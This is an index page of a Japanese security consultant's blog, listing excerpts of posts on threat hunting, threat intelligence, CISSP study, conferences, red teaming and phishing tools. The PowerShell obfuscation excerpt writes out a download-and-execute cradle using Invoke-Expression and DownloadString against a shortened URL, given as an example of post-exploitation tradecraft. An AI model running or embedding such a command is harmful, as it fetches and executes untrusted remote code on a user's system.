セキュリティコンサルタントの日誌から

セキュリティに関するエッセイなど

Threat Hunting for Dummiesを読んでみた!!

カンファレンスでもらった"Threat Hunting for Dummies"を積読していたのですが、時間ができたので読んで見たのでメモをまとめます。EDRで有名なCarbon Black社が書いているので、クオリティも十分でした。 www.carbonblack.com Threat Huntingの定義と目的 …

CISSPの勉強方法

CISSP(Certified Information Systems Security Professional)という試験は、セキュリティの経験と全般的な知識を持っていることを示す資格です。一般的かつセキュリティと重要な資格である一方、独学用の勉強リソースはあまり多くないと言わざるを得ませ…

PowerShellの難読化について

PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t"…

AVTokyo 2017で講演してきました。

昨日、AVTOKYO JPで講演させていただきました。 使わせていただいた資料を公開しました。 [AVTOKYO 2017] What is red team? www.slideshare.net

Cyber Threat IntelligenceとDNSデータ

Cyber Threat IntelligenceやThreat Actor Attributionの観点では、悪性ドメイン(C2ドメイン)は足が速い(すぐに変わる)のでDNSデータ分析は重要な要素となります。 例えば、マルウェア解析チームにより特定のC2通信を発生させていたと報告してきたとし…

Threat Actor Attributionとは何か?

Threat Actor Attributionという単語をきいたことはありますでしょうか? 今回は、Cyber Threat Intelligenceの分野で重要なThreat Actor Attributionについて、以下の講演をもとに勉強してみたいと思います。 www.youtube.com Threat Actor Attributionとは…

思考実験:クラウドソーシングはツールの欠点を補えるか?

久しぶりに記事を更新したいと思います。本日は、Webアプリケーションについての思考実験をしてみたいと思います。 既にご存知の通り、Webアプリケーション診断の脆弱性スキャナとして、様々な製品が登場しています。 IBM AppScan HP WebInspect Rapid7 AppS…

ssmjpのプレゼンテーションを公開しました。

ssmjpにて、Red Teamに関するプレゼンテーションをさせていただきました。資料を公開しました。(公開を忘れていました。すいません) www.slideshare.net

サイバーリスク保険に関する考察

以前某論文誌にサイバーリスク保険について書いたことがあるのですが、最近またサイバーリスク保険について説明する機会があったので、ブログにまとめておこうと思います。 論文執筆時の情報を元にしているため、古い記載がある可能性があります。ご容赦くだ…

米国文化とセキュリティ - なぜ自動化が積極的に採用されるのか?

昔からセキュリティ製品評価をしていると、自動遮断・自動連携など自動化のうたい文句にしていることが非常によくあります。最近は米国のカンファレンスに頻繁に参加していますが、多くの製品のキーワードとして「自動化」は目玉機能として紹介されます。 し…

CISOの役割とは?

企業において、セキュリティ上一番えらい役職をCSOとかCISOと呼びます。(以降、基本的にCISOで統一します) CSO(Chief Security Officer・最高セキュリティ責任者) CISO(Chief Information Security Officer・最高情報セキュリティ責任者) 今回は、CISOの役…

Cyber Threat Intelligenceとは何か?(その1)

今回のエントリーでは、CTI(Cyber Threat Intelligence)について解説をしていきます。 第1回では、Threat Intelligenceの概要について定義していきたいと思います。 Threatとは何か? Threat Intelligenceでは、Threat(脅威)を分析していくわけですが、…

再考:米国の標的型攻撃訓練サービス

先日、標的型メール訓練サービスについて少し米国事情を調べたり、講演で聞いた内容をまとめる機会があり、その内容を共有します。 日本では、標的型攻撃診断では「標的型攻撃メール訓練サービス」などと呼ばれるユーザの開封率などを視覚化してくれるサービ…

Threat Huntingとは何か?(その5)

以前の記事では、 Sqrrl社のThreat Hunting Reference Model(Threat Hunting参照モデル)という考え方から、The Hunting Loopという考え方を紹介しました。 www.scientia-security.org 今回は、その中からThe Hunting Maturity Model(HMM)とThe Hunt Matr…

Cyber Attributionに対抗するCyber Disinformation技術

先日参加したShmooConで、Threat Intelligenceの面白い講演があったので共有します。 www.scientia-security.org Leveraging Threat Intel Disinformation Campaigns Synack社のCTOであるMark Kuhr氏はNSAの勤務経験もあり、Threat Intelligenceの専門家です…

ShmooConに参加してきた!!

2017/01/18 一部記事を追加しました。 ShmooConというカンファレンスにいってきました!! ShmooConはもともとあまり日本であまり有名なカンファレンスではありませんでしたが、以下の記事を見て比較的評判がよいと知り参加した経緯があります。 www.concise…

Threat Huntingとは何か?(その4)

前回は、Trailhead & Hypothesisについて取り上げました。 www.scientia-security.org Sqrrl社はThreat Huntingについては様々なことを提唱していますが、"A Framework of Cyber Threat Hunting"というレポートの中で、Threat Hunting Reference Model(Thre…

Threat Huntingとは何か?(その3)

先日は、APDフレームワークについて取り上げました。 www.scientia-security.org 今回は、Trailheadというキーワードとその背後にある仮説構築について、ホワイトペーパーを読み解きながらまとめていきたいと思います。 Cyber Threat Hunting - Sqrrl Genera…

Threat Huntingとは何か?(その2)

先日、Threat Huntingについて、IOCとPyramid of Painについてまとめました。 www.scientia-security.org 第2回目は、引き続きSqrrl社の記事を元に、別のキーワードを取り上げます。 A Framework for Cyber Threat Hunting Part 2: Advanced Persistent Def…

Threat Huntingとは何か?(その1)

Threat Huntingという概念をご存知でしょうか? 一言で言えば、「高度な標的型攻撃を検知・対応するための方法論」ですが、2015年度ごろから米国のカンファレンス等でよく耳にする単語です。しかしながら、Threath Huntingについて体系的に学べる資料がない…

NY州金融サービス局のサイバーセキュリティの規制について

米国金融系企業の中で現在話題となっているトピックの一つに、ニューヨーク州金融サービス局が提案しているサイバーセキュリティに関する規制が挙げられます。 全文翻訳したので、内容をごらんになりたい方は以下のリンクへどうぞ。 (翻訳・法律の専門家で…

Phishing FrameworkのGoPhishを検証してみた!!

以前、ソーシャル・エンジニアリング系のコミュニティにてGoPhishというオープン・ソースのフィッシングフレームワークを教えてもらい、なかなか使えるという評判を聞いていました。最近やっと検証する機会ができたので、検証結果をまとめています。 なお、U…

DEF CON 24 Social-Engineer Villageで講演してきた!!

2017/01/17 スライドをアップロードしました。 2ヶ月以上前の話ですが、DEFCON 24のThe Social-Engineer Villageにて講演する機会をいただだき、"Does Cultural Differences Become a Barrier for Social Engineering?"というテーマで講演を行ってきました…

ネットワーク・フォレンジック・ツール Broについて

先日、BSidesDCというカンファレンスにて、Bro Clash Courseというコースを受講してきました。そのメモを今日は共有します。 www.scientia-security.org Broとは? ネットワーク・フォレンジック・ツールとして知られており、Threat HuntingなどIR系で最近非…

BSidesDCに参加してきた!!

先日、BSidesDCというイベントに参加してきました。(バックデートして投稿しています。) Security B-Sides Washington DC BSidesシリーズへの参加は、BSidesCharm・BSidesBoston・BSidesLVと過去参加してきており、4回目です。いつも安価にもかかわらず非…

DerbyConに参加してきた!!

2017/01/18 投稿日付を変更しました。 先日、DerbyConに参加してきましたのでその参加報告を。 DerbyConとは? DerbyConとは、ダービー(競馬)で有名なケンタッキー州ルイビルで行われるカンファレンスです。今回6回目と歴史は浅いですが、米国のセキュリ…

DEF CON 2014に参加してきた!!

忙しく時間が取れていませんでしたが、記事を更新します。 BSidesLVの後にDEF CON 24に参加してきました。 DEF CONは、米国で開かれている最大級のカンファレンスのひとつです。通常、BlackHatというカンファレンスと一緒に参加することが多く、様々な分野の…

ペネトレーション・テスト関連ツール 2016

先日つたない記事を書いたところ、(このブログとしては)すごい反響をいただきました(かなりこっそりやっていて誰も見ているとは思わなかったので)。ペネトレーション・テストにみんな関心があるんだなと思い、もうひとつ記事を書こうと思います。 www.sc…

セキュリティの基本7原則

先日、Philadelphia InfoSec Meetupに参加してきました。今回は、Empower Security AcademyというWashington D.C.をベースとした人がセキュリティの基礎とAPI・Wiresharkについて話してくれました。 www.meetup.com 内容がビギナー向けなコンテンツでしたが…

(BlackHatに参加せず)BSidesLVに参加してきた!!

先日、BSidesLVに参加してきました。BSidesLVはBlackHatと同じスケジュールで開催されるカンファレンスです。 www.bsideslv.org BSidesLV:8/2 - 8/3 BlackHat USA:8/3 - 8/4 DEFCON:8/4 - 8/7 BlackHatは同僚が調査に参加していること、参加費も安くない…